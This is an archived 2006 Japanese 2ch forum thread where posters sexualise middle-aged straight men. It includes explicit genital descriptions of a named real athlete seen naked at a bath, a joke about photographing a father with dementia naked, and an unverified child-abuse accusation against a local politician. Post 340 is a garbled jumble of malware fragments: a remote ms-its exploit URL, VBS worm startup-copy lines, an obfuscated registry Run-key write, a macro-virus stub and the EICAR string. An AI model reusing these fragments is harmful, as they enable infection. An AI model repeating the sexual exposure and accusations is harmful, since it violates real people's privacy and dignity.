「役者不足」って、まだまだ造語の域を出ないマイナーな言葉よ。

284 :陽気な名無しさん:2006/12/16(土) 00:37:39 ID:2Lth+q01
いなくていいのにね、こういう奴も。↑

285 :陽気な名無しさん:2006/12/16(土) 02:37:31 ID:e/hYReE3
あたし大馬鹿だから助かったわ。
なぜ「鼻につく人」それも需要が無いに等しい人を
わざわざ「まずまず」とか意って馬鹿丁寧に細かく紹介するのかわからなかったの。
ご本人だったのね。

286 :陽気な名無しさん:2006/12/16(土) 13:17:30 ID:eyiUHP9E
>>282
射精後たちまち皮が戻ってしまう包茎親父って可愛くてたまらない!

287 :陽気な名無しさん:2006/12/16(土) 13:40:22 ID:K/iYctT1
↑それそれ〜 強面デブの太短い仮性ってチャームポイントよね
アップで見ると腹毛〜チン毛の毛並みもいいわ


288 :陽気な名無しさん:2006/12/16(土) 13:46:27 ID:je9b1qUy
>>273
サンクス!
お礼に、柔道スレにあった昔の書き込みを貼る。


14 名前:S*watti 投稿日:02/05/19 21:59 ID:GOSEkrDe
この前銭湯に行ったら、隣に山下泰裕が裸で立っててびっくりした。
ぜんぜん隠さないんだよね〜。
って、ぜんぜん関係ない話でゴメソ(柔道つながりだけど)。

17 名前:禁断の名無しさん 投稿日:02/05/19 22:07 ID:SVXGCVNG
>>14
っで、どんなちんぽしていたのよっ!
こういうかきこするときはちんぽの形状を報告するのはヲンナの常識よ。
でも、なんで山下が銭湯なんかにいるのかしら。

19 名前:S*watti 投稿日:02/05/19 22:13 ID:GOSEkrDe
>>17
ホントにすぐ隣に立ってたので、かえって直視できませんでした。
横目で見た感じだと、あんまり大きくなかったけどムケてて
おいしそうだった(←主観入ってるかも)。
ちなみにその銭湯、東海大学のすぐそばにあって、以前友達
は井上康生を見たと言っていました。
僕はどっちかといえば、康生タンの方を見たかった・・・。


70 名前:禁断の名無しさん 投稿日:02/05/08 23:01 ID:FzOXOmNC
先週の土曜日、ロッカーに荷物を置いてふと隣を見たら
柔道の山下が裸で立っててビクーリした。
近くに東海大があるんだけど、何か関係があるのかな?。
ぜんぜん隠す様子がなかったんだけど、あまりに至近距離だったので
思い切り見るわけにも行かず横目でちらちら見ちゃった。

72 名前:70 投稿日:02/05/08 23:39 ID:xBQApxUK
>>71
大きくはなかったけど、ムケてました。亀頭は黒ずんでませんでした。

ちなみに一緒にいた友達が、そこの銭湯で井上康生も
見たことがあるって言ってた。うらやましい・・・。

77 名前:70 投稿日:02/05/09 22:52 ID:sP/LDz8O
>>76

区?。オダQの東海大学前駅が最寄です。秦野市かな。
確かほたるっていう結構大きな銭湯だったと思います。
夜9:00頃だったんですが、大学生と思われる若い子も一杯いたよ。

289 :陽気な名無しさん:2006/12/16(土) 18:34:10 ID:hRdI3Ojr
じゅくう

290 :陽気な名無しさん:2006/12/16(土) 22:26:00 ID:x8hhWDKe
同じヨコチンもっこりでも山下みたいな有名人のだと反響が違うね・

291 :陽気な名無しさん:2006/12/17(日) 13:09:05 ID:DEhnpP8z
あたしパウチして部屋に貼ったわw>山下画像

292 :陽気な名無しさん:2006/12/17(日) 13:16:15 ID:Iiom7m2O
ttp://vista.undo.jp/img/vi6623227795.jpg
ttp://vista.undo.jp/img/vi6623223430.jpg

293 :陽気な名無しさん:2006/12/17(日) 13:24:28 ID:pbelfmCY
なんか休日のたんびにノン父が落ちてる気がする
もうザ・ベスト上下だけの運営でいいんじゃない?

294 :陽気な名無しさん:2006/12/17(日) 15:26:26 ID:CcKdARGj
>>170>>183>>186
もう消えてる?サーバーが見つかりませんって出るorz
おやじさんどうしてもみたいんで再うpおねがいします
>>214>>240も消えてる('A`)

295 :陽気な名無しさん:2006/12/17(日) 15:49:19 ID:Vy/yW9Lw
おやじさん、自分も祭り系の動画見たいです
うpしてくれるのは有り難いのですがいつもすぐ消えるorDL規制で一回もDLできませんでした
ブログの方にでもかまわないので祭り動画長持ちなアプロダにおながいしますm(_ _)m

296 :陽気な名無しさん:2006/12/17(日) 16:58:45 ID:hNmzl3fV
↑乞食よ
ここで豚に話しかけるな
物乞いは豚掲示板かせめて26でやってくれ

297 :陽気な名無しさん:2006/12/17(日) 17:30:25 ID:uV0NqfWE
26は隔離スレですのでそちらでお願いします。

298 :陽気な名無しさん:2006/12/17(日) 20:45:08 ID:DZQKUsrp
No.29372 2006/12/17(日) 18:20:56
スージーQ ◆SjSUQ7cv3k
会員制NEWサイトについて
このたび新たに、
会員制の『のんけ親父達のナマ写真倶楽部(仮)』を立ち上げることに
…もしもなるとしたら、ご参加くださる方はおられますか?

●内容案●
当掲示板と同じくノンケ中年をテーマに、投稿者が自分で撮影した画像、
もしくは手持ちの銀塩写真をスキャンしたものの、専用の画像掲示板。
入場にパスワード制導入を考えておりますが、細かい部分はまだ決めていません
(提案者であるポップンプリンセスさんは、ギブ&テイク遵守とすべきとの
 意見をお持ちです)。

賛成反対、ご意見、ご提案などもらえればと思います。



うーん・・・・卒アルくらいしか提供できる物がないぞ(泣)

299 :陽気な名無しさん:2006/12/17(日) 21:03:00 ID:hNmzl3fV
うーん
自分撮りしかないな。
あ、のんけじゃなかった。


300 :陽気な名無しさん:2006/12/17(日) 21:31:40 ID:nJyrLOPJ
しょうがねえな、うちの実父でも撮るかな?
認知症が進んでて今日も訳もなくマッパになってるし

301 :陽気な名無しさん:2006/12/17(日) 21:53:34 ID:ksAL7Q9t
ナマ写真倶楽部素敵ね〜
管理とか細かいルールはお任せでいいわ
スージーさんやポップンさんなら信じられるわ!

>300 撮って♪

302 :陽気な名無しさん:2006/12/17(日) 23:26:25 ID:5Dv+1Z+w
本当にギブ&テークなら画像提供してもいいけど、
そのうち画像流出しちゃうもんなあ…。
そんなこんなで今まで外部に画像提供をしたこと無い。
それでも画像流出するってどういう事だ…。

303 :陽気な名無しさん:2006/12/18(月) 02:17:58 ID:iGSRDkLH
「このままでいい」って意見も多いみたいだけど〜
でもリスクを冒して素敵画像を撮ってくださる方はもう少し報われてもいいと思うの。
専用サイトならのん父に貼れなかった画像も貼れる・かも?
結果のん父のレベルが下がるかもしれないけど
元々の趣旨からすればオリジナル画像を貼る所じゃないんだしネ

だけど流出を防ぐのって、どうすればいいのかしら?

304 :陽気な名無しさん:2006/12/18(月) 03:26:58 ID:vxtuMoX/
>>303
絶対無理


305 :陽気な名無しさん:2006/12/18(月) 07:53:21 ID:PuQ583eQ
先日昼の番組だから見た人少ないと思うけど
熟年離婚を防止する中年男の会というグループの取材で
夫婦喧嘩をした時の仲直りのやり方を
その中年男たちが夫婦役になって実践していて思わず笑ったわ
ノンケのおっさんが女言葉しゃべってるのも笑えたが
何よりおっさん同士が寄り添って手を握り腰に手を回したりして
こうやってスキンシップをとりましょう、みたいな解説してたの。

306 :陽気な名無しさん:2006/12/18(月) 11:56:50 ID:0nHh0x1z
>>303
巣痔Qにスキルと管理能力(物理的・精神的の両面)があれば可能だろうが、
今までの経緯をみると無理っぽいw
サポートしてくれる優秀なブレンが何人か必要だね。
画像のコピー防止や暗号を埋め込む初歩的なスキルさえできないお釜に
それを求めるのは所詮無理かも。


307 :陽気な名無しさん:2006/12/18(月) 12:06:13 ID:0CqRGvL9
ttp://www.news24.jp/73442.html
山形・上山市 年越し行事「裸もちつき」動画あり

308 :陽気な名無しさん:2006/12/18(月) 12:08:52 ID:qNubEgge
迫力ないわねwww
なんだか真ん中に人座らせていじめてるような感じだわwww

309 :陽気な名無しさん:2006/12/18(月) 12:43:43 ID:KremCMsT
>>305
どこの局のなんていう番組?是非教えて!検索するから!
いいわね!女言葉をしゃべったり寄り添ったりするノンケ親父は!

310 :陽気な名無しさん:2006/12/18(月) 12:59:53 ID:+A3DjjgJ
>>306
一見ヘヴィな批判だけど、問題点解決のポイントを指し示してくれてるね
ネットで公開する以上、ある程度の流出は、食い止め様のないこと
その点を踏まえた上で、自前の画像には自前のロゴを入れとくよう、貼り主には推奨したい
これは新掲示板だけの話じゃなく、のん父でも同じ事が言える

311 :陽気な名無しさん:2006/12/18(月) 14:31:24 ID:MZn9IP4n
画像流出防止方については、あのフケ専カメラマンが詳しいかと。
スタジオプ

312 :陽気な名無しさん:2006/12/18(月) 18:17:08 ID:KremCMsT
>>311
私はあのカメラマンを、人間的に軽蔑している。本当に人でなしだ。

313 :陽気な名無しさん:2006/12/18(月) 18:34:18 ID:MZn9IP4n
>>312
同意。関わらないのが一番。

314 :陽気な名無しさん:2006/12/18(月) 19:47:36 ID:3bqJ2IqT
あら、そんな人なのね。

315 :陽気な名無しさん:2006/12/18(月) 21:23:21 ID:PuQ583eQ
>>309
昼の2時くらいから日テレでやってる番組
先週の木か金にやっていた。



316 :陽気な名無しさん:2006/12/18(月) 22:47:47 ID:KremCMsT
>>313
あの人はモデルに売り専までやらしてピンはねしてるんだからな。
まるで女衒だよ。

317 :陽気な名無しさん:2006/12/18(月) 22:55:23 ID:MZn9IP4n
>>316
あそこのモデルのその後が知りたい
生きているのかな

318 :陽気な名無しさん:2006/12/18(月) 23:28:10 ID:agGnqIaP
>>292

fAプロの終わりに流れる映像っぽい、、

319 :陽気な名無しさん:2006/12/19(火) 07:42:56 ID:kmL+bntB
   ,;f::::::::::::::::::::::T
   i:::/'" ̄ ̄ヾ:::i
   |/ ,,,,_  ,,,,,,_ヾ|
   |=(へ)=(へ)=|  おっ!良スレが立ったなぁ〜
   {  :::(__..::  |
   ',  ー=ー  ',
 i"./ ヽ___ / ',ヽ
 ヽi          iノ
  ',    ∩    /
   ヽ  (.  )  /
    ',   i!  /
   (___/ \___)


320 :陽気な名無しさん:2006/12/19(火) 18:32:45 ID:TueDWrJ4
永島敏行が今日の細木和子の番組に出るらしいよ


321 :陽気な名無しさん:2006/12/19(火) 19:14:53 ID:h3BdkvRH
>>318
いや そのまんじゃん

322 :陽気な名無しさん:2006/12/19(火) 21:07:20 ID:W+4iGvMq
中国の秦剛て報道官がムカつくんだけどイケる。

323 :陽気な名無しさん:2006/12/20(水) 02:06:38 ID:0NLrCep3
安田大サーカスのクロちゃんって本当に可愛いわ…。
あのスキンヘッドに髭面とのギャップがたまらないわ。

324 :陽気な名無しさん:2006/12/20(水) 10:17:40 ID:0NLrCep3
>>319
このおじさんのモデルは誰?結構イケるんだけど。

325 :陽気な名無しさん:2006/12/20(水) 22:52:25 ID:1zu3lQho
検査官と共にトイレに入り。おち○ちんから、おしっこが出されているか検査官に見られながらコップに75cc以上の尿をだします。

ハァハァ

326 :陽気な名無しさん:2006/12/20(水) 23:58:55 ID:7zvwv/F7
のんちち会員制化中止だってさ

327 :陽気な名無しさん:2006/12/21(木) 01:00:14 ID:vozkdd6h
--------------------------------------------------------------
これまでの画像投稿者の方々が新掲示板に参加できずに
つまらない思いをすることだけは避けたいと思ったからです。
--------------------------------------------------------------

だって。優しいのねスージー
あたし賛成派だったからちょっと残念だけどスージーの「やり方」を支持するわ!


328 :陽気な名無しさん:2006/12/21(木) 01:05:16 ID:mnizmw6F
ノンケオヤジのエロ話にぼっきんきんよ
こういうタイプの人が食われノンケになるのかしら・・・?

ttp://kedamonotengoku.blog81.fc2.com/

329 :陽気な名無しさん:2006/12/21(木) 12:42:24 ID:mnizmw6F
反応ないわね・・・
ホモビ 面接 でググって見つけたとこなんだけど・・

男性ヌードモデルに応募したことがあるらしいわよ

330 :陽気な名無しさん:2006/12/21(木) 14:59:27 ID:Kft11oma
「学生時代」とか書いてるけど意外と最近の事だったり

331 :うp命おやじ ◆X2X.2kWTU6 :2006/12/21(木) 15:33:25 ID:oXOhlpdZ
>>327
ヽ(^0^)ノやさしい〜

332 :陽気な名無しさん:2006/12/21(木) 17:53:02 ID:OfoLB125
カンニング竹山は中島のことをはっきりと「夫婦みたいなものだった」と言っているが、
本当に夫婦みたいな関係だったのだろうか?想像するとちょっとドキドキしちゃう。(^^)
http://headlines.yahoo.co.jp/hl?a=20061221-00000405-yom-ent&kz=ent


333 :陽気な名無しさん:2006/12/21(木) 17:58:30 ID:mdTOAh2N
>332
801板で芸人のスレを探してそこでそのメコ汁を洗い流して二度と同サロ板に顔を出さないで。

334 :陽気な名無しさん:2006/12/21(木) 20:48:20 ID:l3JJMIDF
>>333

姐さんタラ…

335 :陽気な名無しさん:2006/12/21(木) 22:38:35 ID:OfoLB125
こんないいおじさんが66歳で死んじゃうなんて…。もったいない。
http://ca.c.yimg.jp/news/20061221165225/img.news.yahoo.co.jp/images/20061221/jijp/20061221-04917577-jijp-int-view-001.jpg


336 :陽気な名無しさん:2006/12/21(木) 22:48:37 ID:f/7ivOgv
日本人かと思ったら、トルクメニスタンの大統領なのね。

337 :陽気な名無しさん:2006/12/21(木) 23:00:52 ID:SvtNWao/
>>332
不謹慎すぎる・・・・ お前らには血がかよってないのか?

338 :陽気な名無しさん:2006/12/21(木) 23:43:44 ID:Kwn4GcWe
中央アジア系ならドスタム将軍が好きだったわ!

339 :陽気な名無しさん:2006/12/22(金) 12:02:54 ID:eYZWQeqO
系統違うけどパキスタンの
ムシャラフ大統領も素敵

340 :<body onload=window()>:2006/12/22(金) 12:23:35 ID:QzqzPqma
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
܃ܷܵܶޫޭॢ

341 :陽気な名無しさん:2006/12/22(金) 18:19:22 ID:Z5hbC/LU
トルクメニスタンの大統領って北朝鮮級の独裁者だったのね

342 :陽気な名無しさん:2006/12/22(金) 21:46:48 ID:lov7HU+0
カオルちゃん伝説『岸和田少年愚連隊番長足球』
サッカー部マネージャーの沙織が初モロ、無修正
でおマンコを見せるらしい!小島由佳がYUKA
でデビュー。見たい!見たい!見たい!他にも芸
能人が脱ぐらしいんですが誰??ここで告知を見
つけました。pinkmanko.in

343 :陽気な名無しさん:2006/12/22(金) 23:18:38 ID:eKk3jOcO
厚生労働副大臣2人ともだらしないわ!
でも「ショートケーキは我慢できずに食べてしまった」なんて可愛いわ
ttp://www.mhlw.go.jp/bunya/kenkou/metabo/index.html

344 :陽気な名無しさん:2006/12/23(土) 00:42:13 ID:Joc4+19W
ttp://www.p.chiba-u.ac.jp/lab/jyoho/image_common/pict/pict7.jpg

ふふっ

345 :陽気な名無しさん:2006/12/23(土) 11:28:03 ID:Egu0W6jx
>>328
プロフィール画像が「八つ墓村」のミイラを連想させて
テンション下がっちゃうわ

346 :陽気な名無しさん:2006/12/24(日) 18:42:41 ID:++UipRJt
ソニー生命のCMの営業マン役が激イケる!

347 :陽気な名無しさん:2006/12/24(日) 19:19:44 ID:iCTuKlkA
>>346
ttp://www.sonylife.co.jp/corp/lbry/index.html
二人いるけどどっちもオヤオヤだわ
あなた、パッとしない系が好みでしょ?w

348 :陽気な名無しさん:2006/12/24(日) 19:47:46 ID:++UipRJt
>>347サンキュー。
−新しい兄弟編−のほうの好色そうな笑みがたまらんわけよ。

349 :陽気な名無しさん:2006/12/24(日) 20:42:03 ID:hV6kE9B0
テレ東に荒くれ親父

350 :陽気な名無しさん:2006/12/24(日) 22:48:25 ID:OSf03AQ/
今夜のあるある大辞典「温泉?」再放映ないかしら?
何気におやじが温泉入っている図大漁じゃぁないの!

351 :陽気な名無しさん:2006/12/25(月) 01:49:12 ID:6Jl8G9yy
幼い少年達をよく部屋に連れ込み肉体関係を持ち
フォトメや発展場の常連でもあり、いろんな人騙し、さんざん悪いことしていたのに
去年、葛飾の議会議員に当選し
何食わぬ顔で青少年と関わる業務をしてる、中年たかし議員の(`Д´)関連スレ
http://love3.2ch.net/test/read.cgi/gay/1160407693/66-67

これはゲイ出会いサイトに投稿してた頃の写真、本人は合成写真だと大嘘ついていましたw
http://society3.2ch.net/test/read.cgi/mayor/1123678508/76

352 :陽気な名無しさん:2006/12/25(月) 03:41:00 ID:QrNOPoeE
>>350
たまたま録画してあった。
最初の温泉の3人の被験者おやじは全部イケる
途中のCMの森野熊八もかわゆい

353 :陽気な名無しさん:2006/12/25(月) 08:46:05 ID:YcInH2ob
メタボブーム継続のまま
早くハイビジョン時代にならないかな〜って思う

354 :陽気な名無しさん:2006/12/25(月) 13:08:14 ID:cTsdoaxg
ギャランドゥの一本一本まで鮮明に!w

355 :陽気な名無しさん:2006/12/25(月) 14:45:02 ID:+Ei//8FA
ttp://www.okazakiya.com/index.htm
イケルわ

82 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)